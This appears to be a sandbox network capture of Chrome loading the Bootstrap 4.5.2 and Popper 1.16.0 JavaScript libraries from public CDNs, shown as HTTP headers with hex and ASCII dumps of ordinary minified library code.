                                                                                                2025-01-08 06:22:49 UTC1369INData Raw: 65 66 74 3a 66 28 31 3d 3d 73 25 32 26 26 31 3d 3d 64 25 32 26 26 21 6c 26 26 74 3f 6e 2e 6c 65 66 74 2d 31 3a 6e 2e 6c 65 66 74 29 2c 74 6f 70 3a 6d 28 6e 2e 74 6f 70 29 2c 62 6f 74 74 6f 6d 3a 6d 28 6e 2e 62 6f 74 74 6f 6d 29 2c 72 69 67 68 74 3a 66 28 6e 2e 72 69 67 68 74 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 65 2c 74 2c 6f 29 7b 76 61 72 20 6e 3d 44 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6f 3d 65 2e 6e 61 6d 65 3b 72 65 74 75 72 6e 20 6f 3d 3d 3d 74 7d 29 2c 69 3d 21 21 6e 26 26 65 2e 73 6f 6d 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 6e 61 6d 65 3d 3d 3d 6f 26 26 65 2e 65 6e 61 62 6c 65 64 26 26 65 2e 6f 72 64 65 72 3c 6e 2e 6f 72 64 65 72 7d 29 3b 69 66 28 21 69 29 7b 76 61 72 20 72 3d 27 60 27 2b 74
                                                                                                Data Ascii: eft:f(1==s%2&&1==d%2&&!l&&t?n.left-1:n.left),top:m(n.top),bottom:m(n.bottom),right:f(n.right)}}function K(e,t,o){var n=D(e,function(e){var o=e.name;return o===t}),i=!!n&&e.some(function(e){return e.name===o&&e.enabled&&e.order<n.order});if(!i){var r='`'+t
                                                                                                2025-01-08 06:22:49 UTC1369INData Raw: 28 64 29 5b 30 5d 5d 29 2c 5b 70 5b 73 5d 2e 73 70 6c 69 74 28 64 29 5b 31 5d 5d 2e 63 6f 6e 63 61 74 28 70 2e 73 6c 69 63 65 28 73 2b 31 29 29 5d 3b 72 65 74 75 72 6e 20 61 3d 61 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 76 61 72 20 69 3d 28 31 3d 3d 3d 6e 3f 21 72 3a 72 29 3f 27 68 65 69 67 68 74 27 3a 27 77 69 64 74 68 27 2c 70 3d 21 31 3b 72 65 74 75 72 6e 20 65 2e 72 65 64 75 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 27 27 3d 3d 3d 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 26 26 2d 31 21 3d 3d 5b 27 2b 27 2c 27 2d 27 5d 2e 69 6e 64 65 78 4f 66 28 74 29 3f 28 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 3d 74 2c 70 3d 21 30 2c 65 29 3a 70 3f 28 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 2b 3d 74 2c 70 3d 21 31 2c 65 29 3a
                                                                                                Data Ascii: (d)[0]]),[p[s].split(d)[1]].concat(p.slice(s+1))];return a=a.map(function(e,n){var i=(1===n?!r:r)?'height':'width',p=!1;return e.reduce(function(e,t){return''===e[e.length-1]&&-1!==['+','-'].indexOf(t)?(e[e.length-1]=t,p=!0,e):p?(e[e.length-1]+=t,p=!1,e):


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                3192.168.2.449755104.18.10.2074434548C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 06:22:49 UTC610OUTGET /bootstrap/4.5.2/js/bootstrap.min.js HTTP/1.1
                                                                                                Host: maxcdn.bootstrapcdn.com
                                                                                                Connection: keep-alive
                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                sec-ch-ua-mobile: ?0
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                Accept: */*
                                                                                                Sec-Fetch-Site: cross-site
                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                Sec-Fetch-Dest: script
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2025-01-08 06:22:49 UTC966INHTTP/1.1 200 OK
                                                                                                Date: Wed, 08 Jan 2025 06:22:49 GMT
                                                                                                Content-Type: application/javascript; charset=utf-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CDN-PullZone: 252412
                                                                                                CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
                                                                                                CDN-RequestCountryCode: US
                                                                                                Vary: Accept-Encoding
                                                                                                Access-Control-Allow-Origin: *
                                                                                                Cache-Control: public, max-age=31919000
                                                                                                ETag: W/"02d223393e00c273efdcb1ade8f4f8b1"
                                                                                                Last-Modified: Mon, 25 Jan 2021 22:04:11 GMT
                                                                                                CDN-ProxyVer: 1.07
                                                                                                CDN-RequestPullSuccess: True
                                                                                                CDN-RequestPullCode: 200
                                                                                                CDN-CachedAt: 12/15/2024 14:03:42
                                                                                                CDN-EdgeStorageId: 1236
                                                                                                timing-allow-origin: *
                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                X-Content-Type-Options: nosniff
                                                                                                CDN-Status: 200
                                                                                                CDN-RequestTime: 0
                                                                                                CDN-RequestId: c9cbd9b9712b24ea9ff50d77261bcc72
                                                                                                CDN-Cache: HIT
                                                                                                CF-Cache-Status: HIT
                                                                                                Age: 929254
                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8fea1869e8be80d3-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2025-01-08 06:22:49 UTC403INData Raw: 37 62 65 64 0d 0a 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 35 2e 32 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 32 30 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 69 6e 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c
                                                                                                Data Ascii: 7bed/*! * Bootstrap v4.5.2 (https://getbootstrap.com/) * Copyright 2011-2020 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE) */!function(t,
                                                                                                2025-01-08 06:22:49 UTC1369INData Raw: 6e 65 28 5b 22 65 78 70 6f 72 74 73 22 2c 22 6a 71 75 65 72 79 22 2c 22 70 6f 70 70 65 72 2e 6a 73 22 5d 2c 65 29 3a 65 28 28 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 74 7c 7c 73 65 6c 66 29 2e 62 6f 6f 74 73 74 72 61 70 3d 7b 7d 2c 74 2e 6a 51 75 65 72 79 2c 74 2e 50 6f 70 70 65 72 29 7d 28 74 68 69 73 2c 28 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 69 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 65 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 69 3d 65 5b 6e 5d 3b 69 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 69 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 69 2e 63 6f 6e 66 69
                                                                                                Data Ascii: ne(["exports","jquery","popper.js"],e):e((t="undefined"!=typeof globalThis?globalThis:t||self).bootstrap={},t.jQuery,t.Popper)}(this,(function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.confi
                                                                                                2025-01-08 06:22:49 UTC1369INData Raw: 61 74 28 69 29 3b 72 65 74 75 72 6e 20 6f 7c 7c 73 3f 28 6e 3d 6e 2e 73 70 6c 69 74 28 22 2c 22 29 5b 30 5d 2c 69 3d 69 2e 73 70 6c 69 74 28 22 2c 22 29 5b 30 5d 2c 31 65 33 2a 28 70 61 72 73 65 46 6c 6f 61 74 28 6e 29 2b 70 61 72 73 65 46 6c 6f 61 74 28 69 29 29 29 3a 30 7d 2c 72 65 66 6c 6f 77 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 2e 6f 66 66 73 65 74 48 65 69 67 68 74 7d 2c 74 72 69 67 67 65 72 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 65 28 74 29 2e 74 72 69 67 67 65 72 28 22 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 22 29 7d 2c 73 75 70 70 6f 72 74 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 28 22 74 72 61 6e 73 69 74
                                                                                                Data Ascii: at(i);return o||s?(n=n.split(",")[0],i=i.split(",")[0],1e3*(parseFloat(n)+parseFloat(i))):0},reflow:function(t){return t.offsetHeight},triggerTransitionEnd:function(t){e(t).trigger("transitionend")},supportsTransitionEnd:function(){return Boolean("transit
                                                                                                2025-01-08 06:22:49 UTC1369INData Raw: 73 70 65 63 69 61 6c 5b 61 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 5d 3d 7b 62 69 6e 64 54 79 70 65 3a 22 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 22 2c 64 65 6c 65 67 61 74 65 54 79 70 65 3a 22 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 22 2c 68 61 6e 64 6c 65 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 65 28 74 2e 74 61 72 67 65 74 29 2e 69 73 28 74 68 69 73 29 29 72 65 74 75 72 6e 20 74 2e 68 61 6e 64 6c 65 4f 62 6a 2e 68 61 6e 64 6c 65 72 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 7d 3b 76 61 72 20 6c 3d 22 61 6c 65 72 74 22 2c 63 3d 65 2e 66 6e 5b 6c 5d 2c 68 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 3d 74 7d 76 61 72 20 6e 3d 74 2e 70 72 6f 74 6f
                                                                                                Data Ascii: special[a.TRANSITION_END]={bindType:"transitionend",delegateType:"transitionend",handle:function(t){if(e(t.target).is(this))return t.handleObj.handler.apply(this,arguments)}};var l="alert",c=e.fn[l],h=function(){function t(t){this._element=t}var n=t.proto
                                                                                                2025-01-08 06:22:49 UTC1369INData Raw: 32 22 7d 7d 5d 29 2c 74 7d 28 29 3b 65 28 64 6f 63 75 6d 65 6e 74 29 2e 6f 6e 28 22 63 6c 69 63 6b 2e 62 73 2e 61 6c 65 72 74 2e 64 61 74 61 2d 61 70 69 22 2c 27 5b 64 61 74 61 2d 64 69 73 6d 69 73 73 3d 22 61 6c 65 72 74 22 5d 27 2c 68 2e 5f 68 61 6e 64 6c 65 44 69 73 6d 69 73 73 28 6e 65 77 20 68 29 29 2c 65 2e 66 6e 5b 6c 5d 3d 68 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2c 65 2e 66 6e 5b 6c 5d 2e 43 6f 6e 73 74 72 75 63 74 6f 72 3d 68 2c 65 2e 66 6e 5b 6c 5d 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 2e 66 6e 5b 6c 5d 3d 63 2c 68 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 7d 3b 76 61 72 20 75 3d 65 2e 66 6e 2e 62 75 74 74 6f 6e 2c 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74
                                                                                                Data Ascii: 2"}}]),t}();e(document).on("click.bs.alert.data-api",'[data-dismiss="alert"]',h._handleDismiss(new h)),e.fn[l]=h._jQueryInterface,e.fn[l].Constructor=h,e.fn[l].noConflict=function(){return e.fn[l]=c,h._jQueryInterface};var u=e.fn.button,d=function(){funct
                                                                                                2025-01-08 06:22:49 UTC1369INData Raw: 29 7b 76 61 72 20 6e 3d 74 2e 74 61 72 67 65 74 2c 69 3d 6e 3b 69 66 28 65 28 6e 29 2e 68 61 73 43 6c 61 73 73 28 22 62 74 6e 22 29 7c 7c 28 6e 3d 65 28 6e 29 2e 63 6c 6f 73 65 73 74 28 22 2e 62 74 6e 22 29 5b 30 5d 29 2c 21 6e 7c 7c 6e 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 64 69 73 61 62 6c 65 64 22 29 7c 7c 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 64 69 73 61 62 6c 65 64 22 29 29 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 65 6c 73 65 7b 76 61 72 20 6f 3d 6e 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 27 69 6e 70 75 74 3a 6e 6f 74 28 5b 74 79 70 65 3d 22 68 69 64 64 65 6e 22 5d 29 27 29 3b 69 66 28 6f 26 26 28 6f 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 64 69 73 61 62 6c 65 64 22 29 7c 7c 6f 2e 63 6c 61
                                                                                                Data Ascii: ){var n=t.target,i=n;if(e(n).hasClass("btn")||(n=e(n).closest(".btn")[0]),!n||n.hasAttribute("disabled")||n.classList.contains("disabled"))t.preventDefault();else{var o=n.querySelector('input:not([type="hidden"])');if(o&&(o.hasAttribute("disabled")||o.cla
                                                                                                2025-01-08 06:22:49 UTC1369INData Raw: 22 28 6e 75 6d 62 65 72 7c 62 6f 6f 6c 65 61 6e 29 22 2c 6b 65 79 62 6f 61 72 64 3a 22 62 6f 6f 6c 65 61 6e 22 2c 73 6c 69 64 65 3a 22 28 62 6f 6f 6c 65 61 6e 7c 73 74 72 69 6e 67 29 22 2c 70 61 75 73 65 3a 22 28 73 74 72 69 6e 67 7c 62 6f 6f 6c 65 61 6e 29 22 2c 77 72 61 70 3a 22 62 6f 6f 6c 65 61 6e 22 2c 74 6f 75 63 68 3a 22 62 6f 6f 6c 65 61 6e 22 7d 2c 76 3d 7b 54 4f 55 43 48 3a 22 74 6f 75 63 68 22 2c 50 45 4e 3a 22 70 65 6e 22 7d 2c 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 2c 65 29 7b 74 68 69 73 2e 5f 69 74 65 6d 73 3d 6e 75 6c 6c 2c 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 3d 6e 75 6c 6c 2c 74 68 69 73 2e 5f 61 63 74 69 76 65 45 6c 65 6d 65 6e 74 3d 6e 75 6c 6c 2c 74 68 69 73 2e 5f 69 73 50 61 75 73 65 64 3d 21
                                                                                                Data Ascii: "(number|boolean)",keyboard:"boolean",slide:"(boolean|string)",pause:"(string|boolean)",wrap:"boolean",touch:"boolean"},v={TOUCH:"touch",PEN:"pen"},b=function(){function t(t,e){this._items=null,this._interval=null,this._activeElement=null,this._isPaused=!
                                                                                                2025-01-08 06:22:49 UTC1369INData Raw: 69 62 6c 65 3a 74 68 69 73 2e 6e 65 78 74 29 2e 62 69 6e 64 28 74 68 69 73 29 2c 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 69 6e 74 65 72 76 61 6c 29 29 7d 2c 6e 2e 74 6f 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 74 68 69 73 3b 74 68 69 73 2e 5f 61 63 74 69 76 65 45 6c 65 6d 65 6e 74 3d 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 61 63 74 69 76 65 2e 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 22 29 3b 76 61 72 20 69 3d 74 68 69 73 2e 5f 67 65 74 49 74 65 6d 49 6e 64 65 78 28 74 68 69 73 2e 5f 61 63 74 69 76 65 45 6c 65 6d 65 6e 74 29 3b 69 66 28 21 28 74 3e 74 68 69 73 2e 5f 69 74 65 6d 73 2e 6c 65 6e 67 74 68 2d 31 7c 7c 74 3c 30 29 29 69 66 28 74 68 69 73 2e 5f 69 73 53 6c 69 64 69 6e 67 29 65 28 74
                                                                                                Data Ascii: ible:this.next).bind(this),this._config.interval))},n.to=function(t){var n=this;this._activeElement=this._element.querySelector(".active.carousel-item");var i=this._getItemIndex(this._activeElement);if(!(t>this._items.length-1||t<0))if(this._isSliding)e(t
                                                                                                2025-01-08 06:22:49 UTC1369INData Raw: 7b 74 2e 5f 70 6f 69 6e 74 65 72 45 76 65 6e 74 26 26 76 5b 65 2e 6f 72 69 67 69 6e 61 6c 45 76 65 6e 74 2e 70 6f 69 6e 74 65 72 54 79 70 65 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 5d 3f 74 2e 74 6f 75 63 68 53 74 61 72 74 58 3d 65 2e 6f 72 69 67 69 6e 61 6c 45 76 65 6e 74 2e 63 6c 69 65 6e 74 58 3a 74 2e 5f 70 6f 69 6e 74 65 72 45 76 65 6e 74 7c 7c 28 74 2e 74 6f 75 63 68 53 74 61 72 74 58 3d 65 2e 6f 72 69 67 69 6e 61 6c 45 76 65 6e 74 2e 74 6f 75 63 68 65 73 5b 30 5d 2e 63 6c 69 65 6e 74 58 29 7d 2c 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 2e 5f 70 6f 69 6e 74 65 72 45 76 65 6e 74 26 26 76 5b 65 2e 6f 72 69 67 69 6e 61 6c 45 76 65 6e 74 2e 70 6f 69 6e 74 65 72 54 79 70 65 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 5d 26 26 28 74 2e 74 6f 75 63 68
                                                                                                Data Ascii: {t._pointerEvent&&v[e.originalEvent.pointerType.toUpperCase()]?t.touchStartX=e.originalEvent.clientX:t._pointerEvent||(t.touchStartX=e.originalEvent.touches[0].clientX)},i=function(e){t._pointerEvent&&v[e.originalEvent.pointerType.toUpperCase()]&&(t.touch
                                                                                                2025-01-08 06:22:49 UTC1369INData Raw: 65 6d 49 6e 64 65 78 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 69 74 65 6d 73 3d 74 26 26 74 2e 70 61 72 65 6e 74 4e 6f 64 65 3f 5b 5d 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 74 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 2e 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 22 29 29 3a 5b 5d 2c 74 68 69 73 2e 5f 69 74 65 6d 73 2e 69 6e 64 65 78 4f 66 28 74 29 7d 2c 6e 2e 5f 67 65 74 49 74 65 6d 42 79 44 69 72 65 63 74 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 3d 22 6e 65 78 74 22 3d 3d 3d 74 2c 69 3d 22 70 72 65 76 22 3d 3d 3d 74 2c 6f 3d 74 68 69 73 2e 5f 67 65 74 49 74 65 6d 49 6e 64 65 78 28 65 29 2c 73 3d 74 68 69 73 2e 5f 69 74 65 6d 73 2e 6c 65 6e 67 74 68
                                                                                                Data Ascii: emIndex=function(t){return this._items=t&&t.parentNode?[].slice.call(t.parentNode.querySelectorAll(".carousel-item")):[],this._items.indexOf(t)},n._getItemByDirection=function(t,e){var n="next"===t,i="prev"===t,o=this._getItemIndex(e),s=this._items.length


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                4192.168.2.449759104.17.24.144434548C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2025-01-08 06:22:50 UTC388OUTGET /ajax/libs/popper.js/1.16.0/umd/popper.min.js HTTP/1.1
                                                                                                Host: cdnjs.cloudflare.com
                                                                                                Connection: keep-alive
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                Accept: */*
                                                                                                Sec-Fetch-Site: none
                                                                                                Sec-Fetch-Mode: cors
                                                                                                Sec-Fetch-Dest: empty
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                2025-01-08 06:22:50 UTC971INHTTP/1.1 200 OK
                                                                                                Date: Wed, 08 Jan 2025 06:22:50 GMT
                                                                                                Content-Type: application/javascript; charset=utf-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Access-Control-Allow-Origin: *
                                                                                                Cache-Control: public, max-age=30672000
                                                                                                ETag: W/"5eb03fa9-5309"
                                                                                                Last-Modified: Mon, 04 May 2020 16:15:37 GMT
                                                                                                cf-cdnjs-via: cfworker/kv
                                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                                Timing-Allow-Origin: *
                                                                                                X-Content-Type-Options: nosniff
                                                                                                CF-Cache-Status: HIT
                                                                                                Age: 1172496
                                                                                                Expires: Mon, 29 Dec 2025 06:22:50 GMT
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N%2BZ%2F0fZgfI78zW102NjIM0SzpRh6Gdg6sqJTqhyJ8LdO8Vj66Q%2Fn2j0P3ZTdn0GfPA5wmcZ%2BlOWHFA%2BELDiN7TItfVKAHx54KMegedPRZf%2BioI%2Br%2B%2FyxpOm4WAQVoVKND5hqDSSt"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                Strict-Transport-Security: max-age=15780000
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8fea186e8b5b8c06-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2025-01-08 06:22:50 UTC398INData Raw: 35 33 30 39 0d 0a 2f 2a 0a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 46 65 64 65 72 69 63 6f 20 5a 69 76 6f 6c 6f 20 32 30 31 39 0a 20 44 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 28 6c 69 63 65 6e 73 65 20 74 65 72 6d 73 20 61 72 65 20 61 74 20 68 74 74 70 3a 2f 2f 6f 70 65 6e 73 6f 75 72 63 65 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 4d 49 54 29 2e 0a 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 27 6f 62 6a 65 63 74 27 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 27 75 6e 64 65 66 69 6e 65 64 27 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 27 66 75 6e 63 74 69 6f 6e 27 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26
                                                                                                Data Ascii: 5309/* Copyright (C) Federico Zivolo 2019 Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT). */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&
                                                                                                2025-01-08 06:22:50 UTC1369INData Raw: 65 2c 74 29 7b 69 66 28 31 21 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 29 72 65 74 75 72 6e 5b 5d 3b 76 61 72 20 6f 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 64 65 66 61 75 6c 74 56 69 65 77 2c 6e 3d 6f 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 65 2c 6e 75 6c 6c 29 3b 72 65 74 75 72 6e 20 74 3f 6e 5b 74 5d 3a 6e 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 72 65 74 75 72 6e 27 48 54 4d 4c 27 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 3f 65 3a 65 2e 70 61 72 65 6e 74 4e 6f 64 65 7c 7c 65 2e 68 6f 73 74 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 65 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 3b 73 77 69 74 63 68 28 65 2e 6e 6f 64 65 4e 61 6d 65 29 7b 63 61 73 65 27 48 54 4d 4c 27 3a 63 61 73 65 27 42 4f 44 59 27
                                                                                                Data Ascii: e,t){if(1!==e.nodeType)return[];var o=e.ownerDocument.defaultView,n=o.getComputedStyle(e,null);return t?n[t]:n}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY'
                                                                                                2025-01-08 06:22:50 UTC1369INData Raw: 66 2e 68 6f 73 74 3f 61 28 66 2e 68 6f 73 74 2c 74 29 3a 61 28 65 2c 64 28 74 29 2e 68 6f 73 74 29 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 65 29 7b 76 61 72 20 74 3d 31 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 27 74 6f 70 27 2c 6f 3d 27 74 6f 70 27 3d 3d 3d 74 3f 27 73 63 72 6f 6c 6c 54 6f 70 27 3a 27 73 63 72 6f 6c 6c 4c 65 66 74 27 2c 6e 3d 65 2e 6e 6f 64 65 4e 61 6d 65 3b 69 66 28 27 42 4f 44 59 27 3d 3d 3d 6e 7c 7c 27 48 54 4d 4c 27 3d 3d 3d 6e 29 7b 76 61 72 20 69 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 72 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 73 63 72 6f 6c 6c 69
                                                                                                Data Ascii: f.host?a(f.host,t):a(e,d(t).host)}function l(e){var t=1<arguments.length&&void 0!==arguments[1]?arguments[1]:'top',o='top'===t?'scrollTop':'scrollLeft',n=e.nodeName;if('BODY'===n||'HTML'===n){var i=e.ownerDocument.documentElement,r=e.ownerDocument.scrolli
                                                                                                2025-01-08 06:22:50 UTC1369INData Raw: 7c 7c 65 2e 63 6c 69 65 6e 74 57 69 64 74 68 7c 7c 70 2e 77 69 64 74 68 2c 61 3d 73 2e 68 65 69 67 68 74 7c 7c 65 2e 63 6c 69 65 6e 74 48 65 69 67 68 74 7c 7c 70 2e 68 65 69 67 68 74 2c 66 3d 65 2e 6f 66 66 73 65 74 57 69 64 74 68 2d 64 2c 68 3d 65 2e 6f 66 66 73 65 74 48 65 69 67 68 74 2d 61 3b 69 66 28 66 7c 7c 68 29 7b 76 61 72 20 75 3d 74 28 65 29 3b 66 2d 3d 6d 28 75 2c 27 78 27 29 2c 68 2d 3d 6d 28 75 2c 27 79 27 29 2c 70 2e 77 69 64 74 68 2d 3d 66 2c 70 2e 68 65 69 67 68 74 2d 3d 68 7d 72 65 74 75 72 6e 20 67 28 70 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 2c 6f 29 7b 76 61 72 20 69 3d 32 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 26 26 61 72 67 75 6d 65 6e 74 73 5b 32 5d
                                                                                                Data Ascii: ||e.clientWidth||p.width,a=s.height||e.clientHeight||p.height,f=e.offsetWidth-d,h=e.offsetHeight-a;if(f||h){var u=t(e);f-=m(u,'x'),h-=m(u,'y'),p.width-=f,p.height-=h}return g(p)}function b(e,o){var i=2<arguments.length&&void 0!==arguments[2]&&arguments[2]
